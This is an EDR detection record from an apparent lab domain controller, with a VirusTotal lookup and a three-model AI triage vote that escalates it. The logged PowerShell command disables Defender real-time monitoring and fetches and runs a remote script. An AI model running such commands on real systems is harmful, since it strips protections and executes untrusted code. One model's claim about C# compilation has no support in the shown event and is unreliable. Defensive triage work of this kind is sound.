{
  "author": "_soteria-rules-edr-926e2197-189b-4d89-9675-c8993933dc9a[bulk][segment]",
  "cat": "00088-WIN-Set-MpPreference_Disabled",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1041 -CheckPrereqs ; Invoke-AtomicTest T1041 -GetPrereqs ; Invoke-AtomicTest T1041 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 152584192,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pld50FC.tmp.bat T1041 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4558848,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 7784,
        "THIS_ATOM": "c1d5d0ed21717873736d54e669c2a82e",
        "THREADS": 3,
        "TIMESTAMP": 1774364718110,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 7784,
      "PROCESS_ID": 7948,
      "THREADS": 31,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "d428e7b6-53db-4782-aa6b-e435e59ef988",
      "event_time": 1774364719190,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 4357,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "c1d5d0ed21717873736d54e669c2a82e",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "a7a9b78146a0cc20ecb9bae069c2a832"
    }
  },
  "detect_id": "4c57fb1d-61dd-44d7-a3fe-d7c269c2a833",
  "detect_mtd": {
    "description": "Set-MpPreference is a powershell commandlet that configures preferences for Windows Defender scans and updates. This detector looks for Set-MpPreference commandlet supplied with the disable flag.",
    "falsepositives": [
      "This should always be considered suspicious as this is indicating an attempt to disable the AV on the system in question."
    ],
    "references": [
      "https://meterpreter.org/the-latest-trickbot-variant-with-stealthy-code-injection-trick-appear/",
      "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/"
    ],
    "tags": [
      "attack.t1562.001",
      "attack.t1059.001"
    ]
  },
  "gen_time": 1774364723549,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364719\u0026selected=a7a9b78146a0cc20ecb9bae069c2a832",
  "namespace": "general",
  "priority": 3,
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "d428e7b6-53db-4782-aa6b-e435e59ef988",
    "event_time": 1774364719190,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 4357,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "c1d5d0ed21717873736d54e669c2a82e",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "a7a9b78146a0cc20ecb9bae069c2a832"
  },
  "rule_tags": [
    "ext:soteria-rules-edr",
    "attack.t1059.001",
    "attack.t1562.001"
  ],
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "service.WIN-Set-MpPreference_Disabled",
  "ts": 1774364723000
}

{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}

{
  "confidence": 0.95,
  "false_positive_reason": null,
  "investigation_questions": [
    "Is there a corresponding ticket or change request for security control testing on this host?",
    "What user or process created the batch file pld50FC.tmp.bat?",
    "Are there other systems showing similar downloads from the Red Canary GitHub repository?"
  ],
  "ioc_analysis": "The primary indicator of compromise is the explicit command to disable security controls (\u0027-DisableRealtimeMonitoring $true\u0027). Additional indicators include the download of the Atomic Red Team installation script from a public GitHub repository and the execution of a batch file from the C:\\Windows\\TEMP directory, both of which are characteristic of testing or malicious automation.",
  "iocs_extracted": [
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "C:\\Windows\\TEMP\\pld50FC.tmp.bat",
    "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1",
    "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c"
  ],
  "mitre_techniques": [
    "T1562.001",
    "T1059.001",
    "T1041"
  ],
  "recommended_actions": [
    "ESCALATE to Incident Response (unanimous AI verdict)",
    "Isolate affected sensor immediately",
    "Verify if the Red Team activity (Atomic Red Team) was authorized for this specific host and timeframe.",
    "If unauthorized, immediately isolate the host from the network and re-enable Windows Defender real-time monitoring.",
    "Analyze the contents of C:\\Windows\\TEMP\\pld50FC.tmp.bat to identify the initial entry point or scheduling mechanism.",
    "Review network logs for potential exfiltration activity associated with MITRE T1041."
  ],
  "risk_score": 88,
  "severity": "high",
  "summary": "**Vote: UNANIMOUS (3/3 -\u003e TRUE POSITIVE)**\n\n### \u264a gemini-cli Analysis (Primary)\n**Verdict:** true_positive | **Confidence:** 1.0\nThe detection correctly identified a PowerShell process disabling Windows Defender real-time monitoring via the Set-MpPreference cmdlet. The command line analysis confirms the activity is part of an Atomic Red Team simulation, specifically involving the installation of the framework and execution of test T1041 (Exfiltration Over C2 Channel).\n\n**IOC Analysis:** The primary indicator of compromise is the explicit command to disable security controls (\u0027-DisableRealtimeMonitoring $true\u0027). Additional indicators include the download of the Atomic Red Team installation script from a public GitHub repository and the execution of a batch file from the C:\\Windows\\TEMP directory, both of which are characteristic of testing or malicious automation.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a confirmed malicious activity where PowerShell is executing commands to disable antivirus real-time monitoring and download/run the Atomic Red Team framework. The process tree shows compilation of C# code into temporary files, indicating active payload generation.\n\n**IOC Analysis:** The command line contains multiple indicators of compromise including IEX (Invoke-Expression) downloading from a GitHub repository, disabling Windows Defender via Set-MpPreference, and executing Atomic Red Team tests for T1041. The process is running under NT AUTHORITY\\SYSTEM which increases privilege escalation risk.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.9\nA PowerShell process running as SYSTEM attempted to disable Windows Defender real-time monitoring and install tools from GitHub, indicating a potential threat to system security.\n\n**IOC Analysis:** The FILE_PATH is a legitimate PowerShell executable, but the command line includes malicious actions such as disabling real-time monitoring and downloading scripts from GitHub. The HASH is Microsoft-signed, but the behavior matches known malicious patterns. The parent process chain suggests execution from a temporary batch file, which is a common evasion technique.",
  "verdict": "true_positive",
  "voting": {
    "auto_action": "escalate_ir",
    "mode": "unanimous",
    "total_models": 3,
    "vote_summary": [
      "gemini-cli: true_positive (high, 100% confidence)",
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: true_positive (high, 90% confidence)"
    ],
    "votes": [
      {
        "confidence": 1.0,
        "model": "gemini-cli",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.9,
        "model": "deepseek-r1:8b",
        "verdict": "true_positive"
      }
    ],
    "winning_count": 3,
    "winning_verdict": "true_positive"
  }
}